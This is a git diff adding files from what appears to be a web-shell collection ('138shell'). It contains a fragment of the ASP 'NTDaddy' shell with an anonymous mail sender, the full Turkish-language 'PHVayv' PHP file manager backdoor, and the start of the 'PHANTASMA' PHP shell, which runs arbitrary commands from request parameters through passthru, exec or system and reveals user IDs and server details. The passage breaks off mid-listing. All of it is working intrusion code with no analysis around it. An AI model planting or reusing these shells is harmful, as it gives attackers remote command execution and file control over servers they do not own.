+Fields("File1").Value.SaveAs FilePath
+End If
+%>
+<%
+Else
+Dim anonFrom,anonTo,anonSubj,anonBody
+anonFrom = request.form("From")
+anonTo = request.form("To")
+anonSubj = request.form("Subject")
+anonBody = request.form("Body")
+Set objMail = CreateObject("CDONTS.NewMail")
+objMail.From=anonFrom
+objMail.To=anonTo
+objMail.Subject=anonSubj
+objMail.Body=anonBody
+intReturn=objMail.Send()
+%>
+<html>
+<head><title>|[NTDaddy v1.9 | anon email]</title></head>
+<h1>Message sent successfully!</h1><br><br><br>
+<table border=0 cellpadding="0" cellspacing="3">
+<tr>
+<td>
+<input type='button' value='Back' onclick=history.back()> </td>
+<td>
+<h2>[NTDaddy v1.9 - obzerve | fux0r inc.]</h2> </td>
+</tr>
+</table>
+</html>
+<%
+End if
+%>
+
+
+
diff --git a/138shell/P/PH Vayv.php.txt b/138shell/P/PH Vayv.php.txt
new file mode 100644
index 0000000..c01e2c7
--- /dev/null
+++ b/138shell/P/PH Vayv.php.txt	
@@ -0,0 +1,597 @@
+<? if($sistembilgisi > "") {phpinfo();} else { ?>
+
+
+<?$fistik=PHVayv;?>
+
+
+<?if ($sildos>"") {unlink("$dizin/$sildos");} ?>
+
+<?if ($dizin== ""){$dizin=realpath('.');}{$dizin=realpath($dizin);}?>
+
+<?if ($silklas > ""){rmdir($silklas);}?>
+
+<?if ($yeniklasor > "") {mkdir("$dizin/$duzenx2",777);}?>
+
+
+
+<?if ($yenidosya == "1") {
+$baglan=fopen("$dizin/$duzenx2",'w');
+fwrite($baglan,$duzenx);
+fclose($baglan);}
+?>
+
+
+
+
+<?if ($duzkaydet > "") {
+
+$baglan=fopen($duzkaydet,'w');
+fwrite($baglan,$duzenx);
+fclose($baglan);}
+?>
+
+
+
+
+<?if ($yenklas>"") {;?>
+<body topmargin="0" leftmargin="0">
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliştirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalışılan </span></font>
+        <font face="Verdana" style="font-size: 8pt">Dizin</font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+</table>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber30" height="184">
+  <tr>
+    <td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#9F9F9F" align="center" height="144">
+    <form method="POST" action="<?echo "$fistik.php?yeniklasor=1&dizin=$dizin"?>" 
+      <p align="center"><br>
+      <font
+                color="#FFFFFF" size="1" face="Arial">
+<input
+                type="text" size="37" maxlength="32"
+                name="duzenx2" value="Klasör Adı"
+                class="search"
+                onblur="if (this.value == '') this.value = 'Kullanıcı'"
+                onfocus="if (this.value == 'Kullanıcı') this.value=''"
+                style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"></font></p>
+<p align="center">
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Kaydet"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></span><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+&nbsp;</font></b></p>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000" align="center" height="19">
+    &nbsp;</td>
+  </tr>
+  </table>
+  
+
+
+<? } else { ?>
+
+
+
+
+<?if ($yendos>"") {;
+?>
+
+<body topmargin="0" leftmargin="0">
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliştirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalışılan </span></font>
+        <font face="Verdana" style="font-size: 8pt">Dizin</font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+</table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="495">
+  <tr>
+    <td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#9F9F9F" align="center" height="455">
+    <form method="POST" action="<?echo "$fistik.php?yenidosya=1&dizin=$dizin"?>" 
+      <p align="center"><br>
+      <font
+                color="#FFFFFF" size="1" face="Arial">
+<input
+                type="text" size="50" maxlength="32"
+                name="duzenx2" value="Dosya Adı"
+                class="search"
+                onblur="if (this.value == '') this.value = 'Kullanıcı'"
+                onfocus="if (this.value == 'Kullanıcı') this.value=''"
+                style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"></font></p>
+<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red"> 
+          <textarea name="duzenx" 
+          style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-CENTER: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
+        
+          
+          rows="24" cols="122" wrap="OFF">XXXX</textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+<br>
+</font></b>
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Kaydet"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span><br>
+&nbsp;</p>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000" align="center" height="19">
+    &nbsp;</td>
+  </tr>
+  </table>
+  
+
+
+<? } else { ?>
+
+
+
+
+
+<?if ($duzenle>"") {; 
+?>
+
+
+
+
+<body topmargin="0" leftmargin="0">
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliştirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="1">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="1"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalışılan Dosya</span></font></td>
+        <td bgcolor="#D6D6D6" height="1">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4" height="19">
+          <tr>
+            <td width="1" height="19"></td>
+            <td rowspan="2" height="19"><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin/$duzenle"?></font></td>
+          </tr>
+          <tr>
+            <td width="1" height="1"></td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+</table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#9F9F9F">
+    <form method="POST" action="<?echo "PHVayv.php?duzkaydet=$dizin/$duzenle&dizin=$dizin"?>" name="kaypos">
+<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red"> 
+          <br>
+          <textarea name="duzenx" 
+          style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
+        
+          
+          rows="24" cols="122" wrap="OFF"><?$baglan=fopen("$dizin/$duzenle",'r');
+while(! feof ( $baglan ) ){
+$okunan=fgets($baglan,1024);
+echo $okunan;
+} fclose($baglan); ?></textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+<br>
+</font></b>
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Kaydet"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></p>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000">
+    &nbsp;</td>
+  </tr>
+  </table>
+
+
+
+
+
+
+
+
+
+
+
+<?
+} else {
+?>
+
+
+
+<html>
+
+<head>
+<meta http-equiv="Content-Language" content="tr">
+<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<title>PHVayv 1.0</title>
+</head>
+
+<body topmargin="0" leftmargin="0">
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliştirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+
+
+
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalışılan Klasör</span></font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
+            <td width="65">
+            <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber6" height="13">
+              <tr>
+                <td width="100%" bgcolor="#B7B7B7" bordercolor="#9F9F9F" height="13"
+                onmouseover='this.style.background="D9D9D9"'
+                onmouseout='this.style.background="9F9F9F"'
+                style="CURSOR: hand"
+                
+                
+                
+                
+                >
+                <p align="center"><font face="Verdana" style="font-size: 8pt">
+
+
+
+
+
+
+                <a href="<?echo "$fistik.php?dizin=$dizin/../"?>" style="text-decoration: none">
+                <font color="#000000">Üst Klasör</font></a></font></td>
+
+              </tr>
+            </table>
+            </td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+
+
+
+<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber3" height="21">
+  <tr>
+    <td width="625" bgcolor="#000000"><span style="font-size: 2pt">&nbsp;</span></td>
+  </tr>
+  <tr>
+    <td bgcolor="#000000" height="20">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#000000" id="AutoNumber23" bgcolor="#A3A3A3" width="373" height="19">
+      <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber26">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" 
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+        
+        height="19" bordercolor="#000000">
+        <span style="font-weight: 700">
+        <font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+        <a color="#9F9F9F" target="_blank" href="<?echo "$fistik.php?sistembilgisi=1";?>" style="text-decoration: none"><font color="#9F9F9F">Sistem Bilgisi</font></a></font></font></span></td>
+          </tr>
+        </table>
+        </td>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber27">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19" 
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+        bordercolor="#000000">
+        <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
+        <a href="<?echo "$fistik.php?yenklas=1&dizin=$dizin";?>" style="text-decoration: none">
+        <font color="#9F9F9F">Yeni Klasör</font></a></font></td>
+          </tr>
+        </table>
+        </td>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber28">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19"
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+		bordercolor="#000000">
+        <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
+        <a href="<?echo "$fistik.php?yendos=1&dizin=$dizin";?>" style="text-decoration: none"><font color="#9F9F9F">Yeni Dosya</font></a> </font></td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+  </table>
+
+  
+
+
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber7" height="17">
+  <tr>
+    <td width="30" height="17" bgcolor="#9F9F9F">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Tür</font></td>
+    <td height="17" bgcolor="#9F9F9F">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Dosya 
+    Adı</font></td>
+    <td width="122" height="17" bgcolor="#9F9F9F">
+    <p align="center">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;İşlem</font></td>
+  </tr>
+</table>
+
+<?
+if ($sedat=@opendir($dizin)){
+while (($ekinci=readdir ($sedat))){
+if (is_dir("$dizin/$ekinci")){
+?>
+
+<? if ($ekinci=="." or  $ekinci=="..") {
+} else {
+?>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="17">
+  <tr>
+    <td width="30" height="17" bgcolor="#808080">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif"></td>
+    <td height="17" bgcolor="#C4C4C4">
+    <font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$ekinci" ?></font></td>
+    <td width="61" height="17" bgcolor="#C4C4C4" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber15" height="20">
+      <tr>
+        <td width="100%" bgcolor="#A3A3A3"
+        onmouseover="this.style.background='#BBBBBB'"
+        onmouseout="this.style.background='#A3A3A3'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="<?echo "$fistik.php?dizin=$dizin/" ?><?echo "$ekinci";?>" style="text-decoration: none">
+        <font color="#000000">Aç</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+    <td width="60" height="17" bgcolor="#C4C4C4" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber18" height="20">
+      <tr>
+        <td width="100%" bgcolor="#A3A3A3"
+        onmouseover="this.style.background='#BBBBBB'"
+        onmouseout="this.style.background='#A3A3A3'"
+
+
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="<?echo "$fistik.php?silklas=$dizin/$ekinci&dizin=$dizin"?>" style="text-decoration: none">
+        <font color="#000000">Sil</font></a>
+
+        </font></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+<?
+}
+?>
+
+<?
+}}}
+closedir($sedat);
+?>
+
+<?
+if ($sedat=@opendir($dizin)){
+while (($ekinci=readdir ($sedat))){
+if (is_file("$dizin/$ekinci")){
+
+?>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="1">
+  <tr>
+    <td width="30" height="1" bgcolor="#B0B0B0">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/1.gif"></td>
+    <td height="1" bgcolor="#EAEAEA">
+    <font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$ekinci" ?></font>
+    <font face="Arial Narrow" style="font-size: 8pt">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;   ( XXX )&nbsp;</font></td>
+    <td width="61" height="1" bgcolor="#D6D6D6" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber12" height="20">
+      <tr>
+        <td width="100%" bgcolor="#D6D6D6"
+        onmouseover="this.style.background='#ACACAC'"
+        onmouseout="this.style.background='#D6D6D6'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a style="text-decoration: none" target="_self" href="<?echo "$fistik";?>.php?duzenle=<?echo "$ekinci";?>&dizin=<?echo $dizin;?>">
+        <font color="#000000">Düzenle</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+    <td width="60" height="1" bgcolor="#D6D6D6" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber13" height="100%">
+      <tr>
+        <td width="100%" bgcolor="#D6D6D6" no wrap
+        onmouseover="this.style.background='#ACACAC'"
+        onmouseout="this.style.background='#D6D6D6'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="<?echo "$fistik";?>.php?sildos=<?echo $ekinci;?>&dizin=<?echo $dizin;?>" style="text-decoration: none">
+        <font color="#000000">Sil</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+<?
+}}}
+closedir($sedat);
+?>
+
+
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber29">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+</table>
+
+  <tr>
+    <td width="100%" bgcolor="#000000">
+    </body></html><? } ?><? } ?><? } ?><? } ?>
\ No newline at end of file
diff --git a/138shell/P/PHANTASMA.txt b/138shell/P/PHANTASMA.txt
new file mode 100644
index 0000000..59f92af
--- /dev/null
+++ b/138shell/P/PHANTASMA.txt
@@ -0,0 +1,634 @@
+<CENTER>
+<DIV STYLE="font-family: verdana; font-size: 25px; font-weight: bold; color: #F3b700;">PHANTASMA- NeW CmD ;) </DIV>
+<BR>
+<DIV STYLE="font-family: verdana; font-size: 20px; font-weight: bold; color: #F3b700;">Informação do sistema</DIV>
+<?php
+
+// 
+  closelog( );
+
+  $dono = get_current_user( );
+  $ver = phpversion( );
+  $login = posix_getuid( );
+  $euid = posix_geteuid( );
+  $gid = posix_getgid( );
+  if ($chdir == "") $chdir = getcwd( );
+
+?>
+<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0">
+<?php
+
+  $uname = posix_uname( );
+  while (list($info, $value) = each ($uname)) {
+
+?>
+  <TR>
+    <TD><DIV STYLE="font-family: verdana; font-size: 15px;"><?= $info ?>: <?= $value ?></DIV></TD>
+  </TR>
+<?php
+  }
+?>
+ 
+  <TR>
+   <TR>
+    <TD><DIV STYLE="font-family: verdana; font-size: 15px;">Script Current User: <?= $dono ?></DIV></TD>
+  </TR>
+  <TR>
+    <TD><DIV STYLE="font-family: verdana; font-size: 15px;">PHP Version: <?= $ver ?></DIV></TD>
+  </TR>
+  <TR>
+    <TD><DIV STYLE="font-family: verdana; font-size: 15px;">User Info: uid(<?= $login ?>) euid(<?= $euid ?>) gid(<?= $gid ?>)</DIV></TD>
+  </TR>
+  <TR>
+    <TD><DIV STYLE="font-family: verdana; font-size: 15px;">Current Path: <?= $chdir ?></DIV></TD>
+  </TR>
+  <TR>
+    <TD><DIV STYLE="font-family: verdana; font-size: 15px;">Server IP: <?php $aaa =  gethostbyname($SERVER_NAME);  echo $aaa;?></DIV></TD>
+  </TR>
+   <TR>
+    <TD><DIV STYLE="font-family: verdana; font-size: 15px;">Web Server: <?= "$SERVER_SOFTWARE $SERVER_VERSION"; ?></DIV></TD>
+  </TR>
+</TABLE>
+<BR>
+<?php
+
+  if ($cmd != "") {
+    echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Command Mode Run</DIV>";
+
+?>
+
+<DIV STYLE="font-family: verdana; font-size: 20px; font-weight: bold; color: #F3A700;">Command Stdout</DIV>
+<?php
+
+if ($fe == 1){
+$fe = "exec";
+}
+if ($fe == ""){
+$fe = "passthru";
+}
+if ($fe == "2"){
+$fe = "system";
+}
+
+    if (isset($chdir)) @chdir($chdir);
+
+    ob_start( );
+      $fe("$cmd  2>&1");
+      $output = ob_get_contents();
+    ob_end_clean( );
+
+?>
+<TEXTAREA COLS="75" ROWS="8" STYLE="font-family: verdana; font-size: 12px;">
+<?php
+
+    if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
+?>
+</TEXTAREA>
+<BR>
+<?php
+
+  }
+ 
+  if ($safemode != "") {
+    echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Safemode Mode Run</DIV>";
+
+?>
+<DIV STYLE="font-family: verdana; font-size: 20px; font-weight: bold; color: #F3A700;">Safe Mode Directory Listing</DIV>
+<?php
+
+    if ($dir = @opendir($chdir)) {
+      echo "<TABLE border=1 cellspacing=1 cellpadding=0>";
+      echo "<TR>";
+      echo "<TD valign=top>";
+      echo "<b><font size=2 face=arial>List All Files</b> <br><br>";
+      while (($file = readdir($dir)) !== false) {
+        if (@is_file($file)) {
+          $file1 = fileowner($file);
+          $file2 = fileperms($file);
+    	  echo "<font color=green>$file1 - $file2 - <a href=$SCRIPT_NAME?$QUERY_STRING&see=$file>$file</a><br>"; 
+	  // echo "<font color=green>$file1 - $file2 - $file </font><br>";
+          flush( );
+        }
+      }
+
+      echo "</TD>";
+      echo"<TD valign=top>";
+      echo "<b><font size=2 face=arial>List Only Folders</b> <br><br>";
+      if ($dir = @opendir($chdir)) {
+        while (($file = readdir($dir)) !== false) {
+          if (@is_dir($file)) {
+            $file1 = fileowner($file);
+            $file2 = fileperms($file);
+	    echo "<font color=blue>$file1 - $file2 - <a href=$SCRIPT_NAME?$QUERY_STRING&chdir=$chdir/$file>$file</a><br>"; 
+            // echo "<font color=blue>$file1 - $file2 - $file </font><br>";
+          }
+        }
+      }
